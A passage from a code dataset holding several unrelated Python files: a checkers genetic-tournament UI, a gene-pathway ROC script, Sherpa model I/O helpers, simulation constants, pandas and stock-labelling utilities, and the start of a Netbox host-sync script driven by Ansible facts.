len(coefficients)-1\n while maxIndex >=0:\n swapIndex= random.randint(0,maxIndex)\n temp = list(coefficients[swapIndex])\n newCoefficients.append(temp)\n coefficients[swapIndex]= list(coefficients[maxIndex])\n maxIndex -=1\n coefficients = list(newCoefficients)\n \n def playMatch(self,coefficients,p1Index,p2Index,results, iteration, gameNum):\n game1 = []\n game2 = []\n winners = []\n player1 = coefficients[p1Index]\n player2 = coefficients[p2Index]\n print(\"Iteration: %s, Game: %s, Match: 1\"%(iteration,gameNum)) \n [winner, numMoves]= self.tourneyGame(player1, player2)\n self.determineGameResults(winner, numMoves, p1Index, 
p2Index, game1)\n winners.append(winner)\n print(\"Iteration: %s, Game: %s, Match: 2\"%(iteration,gameNum))\n [winner, numMoves] = self.tourneyGame(player2, player1)\n self.determineGameResults(winner, numMoves, p2Index, p1Index, game2)\n winners.append(winner)\n if winners[0] == winners[1]: #same color won both games\n if random.random() < .5: #Take random winner\n winner = game1[0]\n loser = game1[1]\n else:\n winner = game1[1]\n loser = game1[0]\n elif winners[0]==2 or winners[1]==2: #There has been a tie\n if winners[0]==2: #Find The game with no tie and make that the winnner\n winner = game2[0]\n loser = game2[1]\n else:\n winner = game1[0]\n loser = game1[1] \n else:\n winner = game1[0]\n loser = game1[1]\n bisect.insort_left(results, winner)\n bisect.insort_left(results, loser)\n \n def mutate(self, value, flip):\n rndm = random.random()\n if flip:\n if rndm < .4:\n value *=2\n elif rndm < .8:\n value*=.5\n else:\n value*=-1\n else:\n if rndm <.5:\n value *=2\n else:\n value*=.5\n return value\n \n \n def determineGameResults(self,winner,numMoves,redIndex,blackIndex,results):\n pieceCount = Counter(self.shell.board)\n blackRemain = (pieceCount[1] + pieceCount[3]) \n redRemain = (pieceCount[2] + pieceCount[4])\n if winner == 1:\n winnerResults = (0, numMoves,blackRemain-redRemain, redIndex)\n loserResults = (2, numMoves,redRemain-blackRemain, blackIndex)\n elif winner == -1:\n winnerResults = (0, numMoves,redRemain-blackRemain, blackIndex)\n loserResults = (2, numMoves,blackRemain-redRemain, redIndex)\n else: #Tie\n if redRemain > blackRemain:\n winnerResults = (1, blackRemain-redRemain,numMoves, redIndex)\n loserResults = (1, redRemain-blackRemain,numMoves, blackIndex)\n else:\n winnerResults = (1, redRemain-blackRemain,numMoves, blackIndex)\n loserResults = (1, blackRemain-redRemain,numMoves,redIndex)\n bisect.insort_left(results, winnerResults)\n bisect.insort_left(results, loserResults)\n \n def tourneyGame(self, player1, player2):\n numMoves = 0\n self.shell = shell()\n #self.display(self.shell.board, None)\n history = []\n history.append(tuple(self.shell.board))\n winner = None\n while not winner: #Play the game\n if self.shell.turn == 1:\n engineMove = self.shell.engineMove2(player1)\n else:\n engineMove = self.shell.engineMove2(player2)\n numMoves +=1\n if engineMove:\n #self.display(self.shell.board, engineMove)\n #self.master.update()\n #time.sleep(.1)\n #self.display(self.shell.board, None)\n #self.master.update()\n tempBoard = tuple(self.shell.board)\n for boardState in history:\n if tempBoard == boardState: #Tie\n winner = 2\n break\n history.append(tempBoard)\n else:\n winner = self.shell.turn\n self.gameOver(winner)\n return [winner, numMoves]\n \n \n def addMoveToWindow(self, move):\n if self.shell.turn == 1:\n self.rightPanel.insert('end', 'Black: ' + str(move))\n else:\n self.rightPanel.insert('end', 'Red: ' + str(move))\n self.rightPanel.see('end') \n \n def gameOver(self, winner):\n if winner == 1:\n self.rightPanel.insert('end', 'Red Wins')\n elif winner == 2:\n self.rightPanel.insert('end', 'Tie')\n else:\n self.rightPanel.insert('end', 'Black Wins')\n self.rightPanel.see('end')\n \n \nif __name__ == \"__main__\":\n ui = userInterface()\n ui.getGameInfo()\n #ui.prepareGenetic(10000)\n \n","sub_path":"src/userInterface2.py","file_name":"userInterface2.py","file_ext":"py","file_size_in_byte":24420,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"319995315","text":"# plot clime roc\nfrom math import 
sqrt\n\nimport pandas as pd\nimport os\nimport multiprocessing\nimport numpy as np\n\n# get tpr and fpr\nimport sys\n\n\ndef get_input_clime_name(genes):\n    input_pathway = pd.read_csv(genes, sep='\\t')\n    p_name = list(input_pathway.Symbol)\n    return p_name\n\n\ndef tans_predict(pre_path, p_name):\n    # read predict\n    data = pd.read_csv(pre_path, sep='\\t')\n    # get ecm+ and llr\n    re = data[['Gene Symbol', 'LLR']][data['ECM/ECM+'].isin(['ECM+'])]\n\n    # if p_name not in predict result\n    re_symbol = list(re['Gene Symbol'])\n    re_llr = list(re['LLR'])\n    if p_name[0] not in re_symbol:\n        re_symbol.append(p_name[0])\n\n        re_llr.append(0)\n    # change col names\n    dic = {'name': re_symbol, 'score': re_llr}\n    pre = pd.DataFrame(dic)\n    pre = pre.sort_values('score', ascending=False)\n\n    return pre\n\n\ndef get_tpr_fpr(p_name: list,\n                n_name: list,\n                threshold: int,\n                pre: 'dataframe', ) -> \"The tpr and fpr\":\n    \"\"\"\n    Get fpr and tpr\n    :param p_name: Positive genes\n    :param n_name: Negative genes\n    :param threshold: The threshold\n    :param pre: The predict dataframe\n    :return: tpr and fpr\n    \"\"\"\n    tp = len([x for x in p_name if x in list(pre.name[pre.score >= threshold])])\n    fp = len([x for x in n_name if x in list(pre.name[pre.score >= threshold])])\n    tn = len([x for x in n_name if x in list(pre.name[pre.score < threshold])])\n    fn = len([x for x in p_name if x in list(pre.name[pre.score < threshold])])\n    # print((tp, fp, tn, fn))\n\n    tpr = tp / (tp + fn)\n\n    fpr = fp / (fp + tn)\n    if tp + fp == 0:\n        precision = 0\n    else:\n        precision = tp / (tp + fp)\n\n    return precision, tpr, fpr, (tp, fp, tn, fn)  # do every threshold\n\n\n# kegg_matrix = pd.read_csv('/home/yangfang/PCSF/clime_roc/all_kegg_matrix.txt', sep='\\t')\n#\n# all_genes = list(kegg_matrix.Symbol)\n\n\n\n\n# get leave genes names\ndef get_leave_genes(path):\n    leave_genes = {}\n    with open(path) as f:\n        for i in f:\n            line = i.strip().split('\\t')\n            leave_genes[line[0]] = line[1]\n    return leave_genes\n\n\n\n\ndef run_roc(pred, i):\n    input_gene_file_names = pred[:-6]\n\n    input_gene_abs = '/home/yangfang/PCSF/clime_roc/inputgene_10/'\n    input_gene_file = os.path.join(input_gene_abs, input_gene_file_names)\n    # get leave one genes names as positive\n    leave_genes = get_leave_genes('/home/yangfang/PCSF/clime_roc/10_pathway_leave_name.txt')\n    p_names = [leave_genes[input_gene_file_names]]\n\n    # get negative genes names\n    input_clime = get_input_clime_name(input_gene_file)\n\n    # add positive genes so they are excluded from the negatives below\n    input_clime.extend(p_names)\n    input_genes = pd.read_csv('/home/yangfang/PCSF/clime_roc/10pathway.txt', sep='\\t')\n\n    all_pathway_genes = list(input_genes['Symbol'])\n\n    n_names = [var for var in all_pathway_genes if var not in input_clime]\n    pre = tans_predict(os.path.join('/home/yangfang/PCSF/clime_roc/test_10', pred), p_names)\n\n    precision, tpr, fpr, all_r = get_tpr_fpr(p_names, n_names, i, pre)\n    return (precision, tpr, fpr, all_r)\n\n\n\nif __name__ == '__main__':\n\n    all_tpr_fpr_precision = []\n    all_fn = []\n    thr = [i / 2.0 for i in range(60)]\n    all_pre_file = os.listdir('/home/yangfang/PCSF/clime_roc/test_10')\n    for i in reversed(thr):\n\n        each_result = []\n\n        for j in range(10):\n            each_pathway = [x for x in all_pre_file if x.startswith(str(j))]\n            tasks = [(x, y) for x in each_pathway for y in [i]]\n            cores = 8\n            pool = multiprocessing.Pool(processes=cores)\n            # map\n            result = pool.starmap(run_roc, tasks)\n            pool.close()\n            pool.join()\n            # get each result\n            precision_tpr_fpr = [var[:3] for var in result]\n            all_r = [var[-1] for var in result]\n            # trans to 
array\n precision_tpr_fpr_array = np.array(precision_tpr_fpr)\n # get each mean\n mean_p_tpr_fpr_array = precision_tpr_fpr_array.mean(axis=0)\n each_result.append(mean_p_tpr_fpr_array)\n # get all tpr fpr\n all_fn.extend(all_r)\n\n each_result_array = np.array(each_result)\n all_mean_p_t_f_array = each_result_array.mean(axis=0)\n mean_precision = all_mean_p_t_f_array[0]\n mean_tpr = all_mean_p_t_f_array[1]\n mean_fpr = all_mean_p_t_f_array[2]\n print(mean_precision, mean_tpr, mean_fpr)\n all_tpr_fpr_precision.append((mean_tpr, mean_fpr, mean_precision))\n\n f = open('/home/yangfang/PCSF/clime_roc/3_pathway_tpr_fpr_precision_n_in_10_update.txt', 'a')\n f.write('tpr\\tfpr\\tprecision\\n')\n\n for i in all_tpr_fpr_precision:\n f.write('{0}\\t{1}\\t{2}\\n'.format(i[0], i[1], i[2]))\n\n f.close()\n\n f2 = open('/home/yangfang/PCSF/clime_roc/3_pathway_tp_fp_tn_fn_n_in_10.txt_update', 'a')\n f2.write('tp\\tfp\\ttn\\tfn\\n')\n\n for j in all_fn:\n f2.write('{0}\\t{1}\\t{2}\\t{3}\\n'.format(j[0], j[1], j[2], j[3]))\n f2.close()\n","sub_path":"PaPr/clime/plot_roc.py","file_name":"plot_roc.py","file_ext":"py","file_size_in_byte":5009,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"437319554","text":"# Licensed under a 3-clause BSD style license - see LICENSE.rst\n\"\"\"Morphology utility functions (mostly I/O).\"\"\"\nfrom __future__ import absolute_import, division, print_function, unicode_literals\nimport json\n\n__all__ = ['read_ascii', 'read_json', 'write_all', 'write_ascii', 'write_json']\n\n\ndef _name(ii):\n \"\"\"Use this to make the model name for source number `ii`.\"\"\"\n return 'normgauss2d.source_{0:02d}'.format(ii)\n\n\ndef _set(name, par, val):\n \"\"\"Set a source parameter.\"\"\"\n import sherpa.astro.ui as sau\n sau.set_par('{name}.{par}'.format(**locals()), val)\n # try:\n # exec(name + '.' + par + '=' + str(val))\n # except Exception as e:\n # print e\n\n\ndef _model(source_names):\n \"\"\"Build additive model string for Gaussian sources.\"\"\"\n return ' + '.join(['normgauss2d.' 
+ name for name in source_names])\n\n\ndef read_json(source, setter):\n    \"\"\"Read from JSON file.\"\"\"\n    if isinstance(source, dict):\n        # Assume source is a dict with correct format\n        d = source\n    else:\n        # Assume source is a filename with correct format\n        d = json.load(open(source))\n    source_names = d.keys()\n    model = _model(source_names)\n    setter(model)\n    for name, pars in d.items():\n        for par, val in pars.items():\n            _set(name, par, val)\n\n\ndef read_ascii(filename, setter):\n    \"\"\"Read from ASCII file.\"\"\"\n    lines = open(filename).readlines()\n    tokens = [line.split() for line in lines]\n    # keep per-line correspondence; zipping over sets would misalign name/par/val\n    names = [token[0] for token in tokens]\n    pars = [token[1] for token in tokens]\n    vals = [token[2] for token in tokens]\n\n    model = _model(set(names))\n    setter(model)\n    for name, par, val in zip(names, pars, vals):\n        _set(name, par, val)\n\n\ndef write_json(pars, filename):\n    \"\"\"Write to JSON file.\"\"\"\n    d = {}\n\n    for par in pars:\n        if not par.modelname in d.keys():\n            d[par.modelname] = {}\n\n        d[par.modelname][par.name] = par.val\n\n    json.dump(d, open(filename, 'w'), sort_keys=True, indent=4)\n\n\ndef write_ascii(pars, filename):\n    \"\"\"Write to ASCII\"\"\"\n    fh = open(filename, 'w')\n    for par in pars:\n        fh.write('{0} {1} {2}\\n'.format(par.modelname, par.name, par.val))\n    fh.close()\n\n\ndef write_all(filename='results.json'):\n    \"\"\"Dump source, fit results and conf results to a JSON file.\n\n    http://www.astropython.org/snippet/2010/7/Save-sherpa-fit-and-conf-results-to-a-JSON-file\n    \"\"\"\n    import sherpa.astro.ui as sau\n    out = dict()\n\n    if 0:\n        src = sau.get_source()\n        src_par_attrs = ('name', 'frozen', 'modelname', 'units', 'val', 'fullname')\n        out['src'] = dict(name=src.name,\n                          pars=[dict((attr, getattr(par, attr)) for attr in src_par_attrs)\n                                for par in src.pars])\n\n    try:\n        fit_attrs = ('methodname', 'statname', 'succeeded', 'statval', 'numpoints', 'dof',\n                     'rstat', 'qval', 'nfev', 'message', 'parnames', 'parvals')\n        fit = sau.get_fit_results()\n        out['fit'] = dict((attr, getattr(fit, attr)) for attr in fit_attrs)\n    except Exception as err:\n        print(err)\n\n    try:\n        conf_attrs = ('datasets', 'methodname', 'fitname', 'statname', 'sigma', 'percent',\n                      'parnames', 'parvals', 'parmins', 'parmaxes', 'nfits')\n        conf = sau.get_conf_results()\n        out['conf'] = dict((attr, getattr(conf, attr)) for attr in conf_attrs)\n    except Exception as err:\n        print(err)\n\n    try:\n        covar_attrs = ('datasets', 'methodname', 'fitname', 'statname', 'sigma', 'percent',\n                       'parnames', 'parvals', 'parmins', 'parmaxes', 'nfits')\n        covar = sau.get_covar_results()\n        out['covar'] = dict((attr, getattr(covar, attr)) for attr in covar_attrs)\n    except Exception as err:\n        print(err)\n\n    if 0:\n        out['pars'] = []\n        for par in src.pars:\n            fullname = par.fullname\n            if any(fullname == x['name'] for x in out['pars']):\n                continue  # Parameter was already processed\n            outpar = dict(name=fullname, kind=par.name)\n\n            # None implies no calculated confidence interval for Measurement\n            parmin = None\n            parmax = None\n            try:\n                if fullname in conf.parnames:  # Confidence limits available from conf\n                    i = conf.parnames.index(fullname)\n                    parval = conf.parvals[i]\n                    parmin = conf.parmins[i]\n                    parmax = conf.parmaxes[i]\n                    if parmin is None:\n                        parmin = -float('inf')  # None from conf means infinity, so set accordingly\n                    if parmax is None:\n                        parmax = float('inf')\n                elif fullname in fit.parnames:  # Conf failed or par is uninteresting and wasn't sent to conf\n                    i = fit.parnames.index(fullname)\n                    parval = fit.parvals[i]\n                else:  # No fit or conf value (maybe 
frozen)\n parval = par.val\n except Exception as err:\n print(err)\n\n out['pars'].append(outpar)\n if filename is None:\n return out\n else:\n json.dump(out, open(filename, 'w'), sort_keys=True, indent=4)\n","sub_path":"gammapy/image/models/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":5239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"43661990","text":"__author__ = 'nacho'\n\n\n# *************** BUG CONSTANTS ***************\n# Index of memory blocks and pointer registers\nHEAP=0\nSTACK=1\nCODE=2\n# Index of other registers\nCOMM=3\nENER=4\nMATU=5\nOFFS=6\nDIET=7\nSHRE=8\n\n\n# Number of registers. The three registers are block pointers (stack, code, heap)\nNREGS=10\n# Number of memory blocks\nNBLOCKS=3\n# Size of memory blocks\nMAX_MEM=100\n\n# Max Energy\nENERGY=100\n\n# Init Energy\nINITENERGY=50\n\n\n# Percentage of energy to share\nSHARENERGY=50\n# Number of descendants\nOFFSPRING=2\n# Max size of the mutation\nDELTA=3\n\n# Diet Type\nHERB=0\nCARN=1\n# OMNI has to be the last one\nOMNI=2\n\n\nOPS=['RST', # Resets the PC\n 'NOP', # NO Operation\n 'PUSH', # PUSH n ; Pushes n into the STACK\n 'ST', # ST Reg ; Copy value of register to stack\n 'LD', # LD Reg ; Copy value of stack to register\n 'STM', # STM Address ; Copy value in stack to heap address\n 'LDM', # LDM Address ; Copy value in heap address to stack\n 'STP', # STP Reg ; Copy value pointed by register to stack\n 'LDP', # LDP Reg ; Copy value in stack to memory address pointed by register\n 'MOV', # Sets the COMM register to MOV\n 'MOVA', # Sets the COMM register to MOV AWAY\n 'SRFD', # Sets the COMM register to SEARCH FOOD. Pushes direction to the stack\n 'SRBG', # Sets the COMM register to SEARCH BUG. Pushes direction to the stack\n 'ATK', # Attacks one bug in the same location\n 'SHR', # Shares energy with bus in the same location\n 'ADD', # Adds the two numbers in the stack. Stores the result in the stack\n 'MUL', # Multiplies the two numbers in the stack. Stores the result in the stack\n 'DIV', # Pops A, Pops B, Divides A into B. 
If B is zero, does nothing\n    'JMF', # JMF n ; Jumps the PC forward n memory addresses\n    'JMB', # JMB n ; Jumps the PC backward n memory addresses\n    'JZ' , # JZ address ; Jumps to the address in the CODE memory if stack is zero\n    'JNZ' , # JNZ address ; Jumps to the address in the CODE memory if stack is not zero\n]\n\n# Step return values\nRETOK=0\nRETDEAD=1 # list of identifiers of dead bugs\nRETOFFS=2 # list of offspringed bugs\n\n\n# *************** WORLD CONSTANTS ***************\n\n# side of the world\n#BOARDSIZE=50\n#BOARDSIZE=200\n#BOARDWIDTH=4\n#BOARDHEIGHT=2\nBOARDWIDTH=200\nBOARDHEIGHT=200\n\n\n\n# Food per cell\nFOODPACK=10\n\n\n# Index in the sowratevalues of initial sowrate\n#SOWRATE=4\nSOWRATE=0\n\nMUTRATE=1 # percentage\nSTDDEV=10 # percentage\n\n\n# *************** GUI CONSTANTS ***************\n\n# Dimensions of the window looking at the map (<= as boardsize)\n#TILESWIDTH=BOARDWIDTH\n#TILESHEIGHT=BOARDHEIGHT\nTILESWIDTH=50\nTILESHEIGHT=50\nTILESIZE=10\n\nMAPWIDTH=TILESWIDTH*TILESIZE\nMAPHEIGHT=TILESHEIGHT*TILESIZE\nMARGIN=4\n\nHSCROLLHEIGHT=20\nCONTROLWIDTH=200\nCONTROLHEIGHT=MAPHEIGHT+HSCROLLHEIGHT\n\n\n\nWINWIDTH=MAPWIDTH+CONTROLWIDTH\nWINHEIGHT=MAPHEIGHT+HSCROLLHEIGHT\n\n\nCONSOLEHEIGHT=150\nINFOWIDTH=75\n\nRED=(255,0,0)\nORANGE=(255,165,0)\nYELLOW=(255,255,0)\nGREEN=(0,205,0)\nBROWN=(153,76,0)\nWHITE=(255,255,255)\nPINK=(250,20,147)\nBLACK=(0,0,0)\n\nHERBCOLOR=YELLOW\nCARNCOLOR=BLACK\nOMNICOLOR=PINK\n\n\n\n\n","sub_path":"constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":3072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"603075165","text":"from pandas import DataFrame\nimport logging\nimport sys\n\n\ndef create_dataFrame_from_csv(csv_path, delimiter, *columns):\n    \"\"\"\n    Creates a pandas dataFrame from a .csv.\n    Uses the passed column names as the header for each column; the order of the passed columns must match the order inside the csv.\n    Dynamically detects how many columns were passed and splits the .csv accordingly. Splits at the passed delimiter.\n\n    Parameters\n    ----------\n    csv_path : str\n        Path to the csv file which should be transformed to a pandas dataframe\n    delimiter : str\n        Delimiter of the .csv file\n    columns : str\n        Captions of the pandas dataframe. 
The module divides the individual lines of the .csv at the delimiter \n        and stores them in the dataframe, based on the number of captions passed.\n\n    Returns\n    -------\n    Pandas dataframe\n        Pandas dataframe created from the passed .csv\n    \"\"\"\n\n    # read csv into var\n    with open(csv_path, 'r') as file:\n        csv_data = file.read()\n\n    # Split csv at linebreaks to get each entry alone\n    data_array = csv_data.split('\\n')\n\n    # Init lists for dataframe creation\n    # Lists in list for simple loop through later\n    lists = []\n    for n in range(len(columns)):\n        lists.append([])\n\n    # For each entry (line) in csv...\n    for entry in data_array:\n        if entry != '': # Only if line is not empty\n            # split at {delimiter} and add value to the lists\n            # Loop through columns, so dynamically assign as many 'splits' as needed (based on amount of columns)\n            for n in range(len(columns)):\n                lists[n].append(entry.split(delimiter)[n])\n\n    # Create dynamically the raw_data dictionary\n    raw_dataframe = {}\n    for idx, val in enumerate(columns):\n        # For each column passed, add the previously created list with all values to the dictionary with the passed column name as key\n        raw_dataframe[val]=lists[idx]\n\n    # Creating dataframe from raw_dataframe\n    df = DataFrame(raw_dataframe, columns=columns)\n\n    return df\n\ndef add_column_to_df(df, header_name):\n    \"\"\"\n    Adds a new column with the passed header name to the passed dataframe\n    \n    Parameters\n    ----------\n    df : pandas dataframe\n        dataframe which should get the new column\n    header_name : str\n        Header of the new column\n\n    Returns\n    -------\n    pandas dataframe\n        Passed dataframe with the new column added\n    \"\"\"\n    df[header_name] = ''\n    return df","sub_path":"modules/handling_pandas.py","file_name":"handling_pandas.py","file_ext":"py","file_size_in_byte":2474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"234448252","text":"# _*_coding:utf-8_*_\nimport pandas as pd\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\nfrom config import Arg\n\nargs = Arg()\n\n\"\"\"\nLabel a single stock based on its daily price change (p_change)\nParameters:\n    code: stock code\nReturns:\n    the stock data with a label column added\n\"\"\"\n\n\ndef addLabelToSingleStock(code):\n    data = pd.read_csv(args.hs300path + code + '.csv')  # read the data\n    data = data[['open', 'low', 'high', 'close', 'volume', 'p_change']].copy()\n    m = data.shape[0]\n    data['label'] = np.zeros((m, 1))  # initialize the label column to 0\n\n    for i in range(m):\n        p_change = data['p_change'].iloc[i]\n        if p_change > 0:\n            data['label'].iloc[i] = 1\n        else:\n            data['label'].iloc[i] = -1\n    data = data.drop(['p_change'], axis=1)\n    return data\n\n\n\"\"\"\nSplit into training and test sets\nParameters:\n    dataMax: stock dataset\nReturns:\n    X_train: training-set feature matrix\n    Y_train: training-set label matrix\n    X_test: test-set feature matrix\n    Y_test: test-set label matrix\n\"\"\"\n\n\ndef split_train_test(dataMax):\n    # X: feature columns, Y: label column\n    X = dataMax.iloc[:, :-1].values\n    Y = dataMax.iloc[:, -1].values\n    X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=0.2)\n    # convert the datasets to matrices\n    X_train = np.mat(X_train)\n    X_test = np.mat(X_test)\n    Y_train = np.mat(Y_train).T\n    Y_test = np.mat(Y_test).T\n    return X_train, Y_train, X_test, Y_test\n\n\n\"\"\"\nGet the stock data for a given trade date from the downloaded files,\nmerge it into one dataframe, and add labels\n\"\"\"\n\n\ndef merge_day_data(time):\n    # read the stock basics file to get the list of stock codes\n    pool = pd.read_csv('../data/stock_basic/stock_basic.csv')\n    day_stock = pd.DataFrame()\n    for code in pool.ts_code:\n        path = '../data/mark_yield/' + code + '.csv'\n        df = pd.read_csv(path, index_col='trade_date', parse_dates=True)\n        df = df.sort_values('trade_date')\n        df = df[['ts_code', 'open', 'high', 'low', 'close', 'pre_close', 'change', 'pct_chg', 
'vol', 'amount', 'yield']]\n        data = df[time:time]\n        if data is not None:\n            day_stock = pd.concat([day_stock, data])\n    day_stock = day_stock.sort_values(by='yield', ascending=False)\n    l = len(day_stock)\n    day_stock = pd.concat([day_stock[:int(0.25 * l)], day_stock[int(0.75 * l):]])\n    m = day_stock.shape[0]\n    day_stock['label'] = np.ones((m, 1))\n    for i in range(m):\n        if i > len(day_stock) / 2 - 1:\n            day_stock['label'].iloc[i] = -1\n    return day_stock\n\n\n\"\"\"\nFollowing the SSE trading calendar, sample the downloaded stock data\nevery 20 trading days and write it to the target files\n\"\"\"\n\n\ndef download_time_set():\n    # get the SSE trading dates\n    cal_date = pd.read_csv('../data/trade_cal/trade_cal_sse.csv')\n    # at 20-trading-day intervals, take the fourteen sample dates before the current date\n    cal_date = cal_date[cal_date.is_open == 1]['cal_date'][::20][14:29]\n    for dt in cal_date:\n        df = merge_day_data(str(dt))\n        path = '../data/day_stock_process/' + str(dt) + '.csv'\n        df.to_csv(path)\n\n\n\"\"\"\nMark each stock's return over the next 20 trading days and save it to file\n\"\"\"\n\n\ndef mark_stock_yield():\n    pool = pd.read_csv('../data/stock_basic/stock_basic.csv')\n    for code in pool.ts_code:\n        df = pd.read_csv('../data/stock_basic/' + code + '.csv')\n        m = df.shape[0]\n        df['yield'] = np.zeros((m, 1))\n        df['yield'] = np.round((df['close'].shift(-20) - df['close']) / df['close'], 2)\n        df.to_csv('../data/mark_yield/' + code + '.csv', index=0)\n\n\n\"\"\"\nMark the HS300 index's return over the next 20 days\n\"\"\"\n\n\ndef mark_hs300_yield():\n    df = pd.read_csv('../data/index_data/399300.csv')\n    m = df.shape[0]\n    df['yield'] = np.zeros((m, 1))\n    df['yield'] = np.round((df['close'].shift(-20) - df['close']) / df['close'], 2)\n    df.to_csv('../data/index_data/399300.csv', index=0)\n","sub_path":"util/dataprocess.py","file_name":"dataprocess.py","file_ext":"py","file_size_in_byte":3866,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"345083779","text":"\n#!/opt/XXXXX/utils/XXXXX-python/python3/bin/python3\n\nimport json\nimport argparse\nimport pynetbox\nimport re\nimport os\nimport logging\nfrom ipaddress import IPv4Network\n\n#logging.basicConfig(filename='netbox_sync.log',level=logging.DEBUG)\nlogging.basicConfig(format='%(levelname)s: %(message)s', level=logging.INFO)\n\nparser = argparse.ArgumentParser()\nparser = argparse.ArgumentParser(description='Tool that updates hosts on Netbox')\nparser.add_argument(\"--hostname\", help=\"Host to update\", type=str, required=False)\nparser.add_argument(\"--config\", help=\"JSON Configuration file that contains Auth Token and Server URL values\", type=str, required=True)\nparser.add_argument(\"--factpath\", help=\"Folder path containing ansible fact output\", required=True)\nargs = parser.parse_args()\n\nignore_interfaces = ['lo', 'usb.*', '.*tun.*']\nregex_filter = \"(\" + \")|(\".join(ignore_interfaces) + \")\"\n\n\nVMvaluemapping= {\n    #Ansible Tree Key : #Netbox Key\n    'ansible_processor_vcpus': 'vcpus',\n    'ansible_memtotal_mb': 'memory',\n    'ansible_processor_threads_per_core': { 'custom_fields': 'hyperthreading'},\n    'ansible_processor_count': { 'custom_fields': 'cpusockets'},\n    'ansible_kernel': { 'custom_fields': 'kernel'},\n    'ansible_distribution_version': { 'custom_fields': 'linuxdistribution'},\n    'ansible_dns' : { 'nameservers': {'custom_fields':'dnsservers'}, 'search': {'custom_fields' : 'dnssearch'}}\n}\n\nHDvaluemapping = {\n    #Ansible Tree Key : #Netbox Key\n    'ansible_processor_cores': { 'custom_fields': 'cores' },\n    'ansible_memtotal_mb': { 'custom_fields': 'memory' },\n    'ansible_processor_threads_per_core': { 'custom_fields': 'hyperthreading'},\n    'ansible_processor_count': { 'custom_fields': 'cpusockets'},\n    
'ansible_product_serial': 'serial',\n    'ansible_kernel': { 'custom_fields': 'kernel'},\n    'ansible_distribution_version': { 'custom_fields': 'linuxdistribution'},\n    'ansible_dns' : { 'nameservers': {'custom_fields':'dnsservers'}, 'search': {'custom_fields' : 'dnssearch'}}\n}\n\nlocal_valuemapping = {\n    #file.fact name :{ netbox_field_name }\n    'dnsalias' : 'custom_fields',\n    'onload' : 'custom_fields'\n}\n\nwith open(f'{args.config}') as config_file:\n    config = json.load(config_file)\n\nnb = pynetbox.api(config['api_endpoint'], token=f'{config[\"token\"]}')\n\n\ndef parse_json(filepath):\n    logging.debug(f'Parsing: {filepath}')\n    hostinfo = ''\n    try:\n        with open(f'{args.factpath}/{filepath}') as f:\n            hostinfo = json.load(f)\n    except Exception as e:\n        logging.critical(f'{filepath} WAS UNABLE TO BE LOADED')\n    \n    return hostinfo\n\n\n\n\ndef update_host(hostname, values):\n    logging.info(f'Starting to gather update values for {hostname}')\n    try:\n        logging.debug(values['ansible_product_name'])\n    except:\n        logging.critical(f'Couldnt grab ansible_product_name from {hostname}, skipping')\n        return\n    updatedict = {}\n    valuemapping = {}\n\n    if 'VMware' in values['ansible_product_name'] or 'Virtual' in values['ansible_product_name']:\n        valuemapping = VMvaluemapping\n        nbhost = nb.virtualization.virtual_machines.get(name=hostname)\n    else:\n        valuemapping = HDvaluemapping\n        nbhost = nb.dcim.devices.get(name=hostname)\n    \n    try:\n        nbdict = dict(nbhost)\n        #logging.debug(nbdict)\n    except:\n        logging.critical(f'Error getting {hostname} from netbox - NOT UPDATING.')\n        badhosts.append(hostname)\n        return\n    for v in values:\n        #Ansible local values have special recursion\n        if 'ansible_local' in v:\n            local_values = values[v]\n            logging.debug(f'Local Values: {local_values}')\n            for local_fact in local_values:\n                if local_fact in local_valuemapping:\n                    logging.debug(f'Found local fact {local_fact}, value {local_values[local_fact][\"main\"]}')\n                    #strip this stupid big dictionary down to something manageable \n                    for fact_key, fact_value in local_values[local_fact]['main'].items():\n                        logging.debug(f'{fact_key} {fact_value}')\n                        mapping_key = local_valuemapping[local_fact]\n                        if mapping_key not in updatedict:\n                            updatedict[mapping_key] = nbdict[mapping_key]\n                            logging.debug(f'Copied current {mapping_key} to updatedict for modification: {updatedict[mapping_key]}')\n                        nbvalue = nbdict[mapping_key][fact_key]\n                        logging.debug(f'Current netbox value was {nbvalue}')\n                        if fact_value != nbvalue:\n                            logging.info(f'Values Differ, Updating dictionary')\n                            updatedict[mapping_key].update({ fact_key : fact_value })\n            continue\n        if v in valuemapping:\n            if type(valuemapping[v]) == dict and len(valuemapping[v]) == 1:\n                #We need to submit the FULL dictionary back to netbox, or any manually entered stuff will be deleted when we update\n                for key, value in valuemapping[v].items():\n                    logging.debug(f'Working with key: {key}')\n                    if key not in updatedict:\n                        updatedict[key] = nbdict[key]\n                        logging.debug(f'Copying current {key} to updatedict for modification: {updatedict[key]}')\n                    logging.debug(value)\n                    nbvalue = nbdict[key][value] \n            elif type(valuemapping[v]) == dict and len(valuemapping[v]) > 1:\n                logging.debug('Working with an ansible key that has children.')\n                child_values = values[v]\n                logging.debug(f'{child_values}')\n                for dictionarykey, dictionaryvalue in valuemapping[v].items():\n                    #nameservers: {custom_fields, dns servers}\n                    if not dictionarykey in child_values:\n                        logging.debug(f'Did not find {dictionarykey} in child_values: {child_values}')\n                        continue\n                    for 
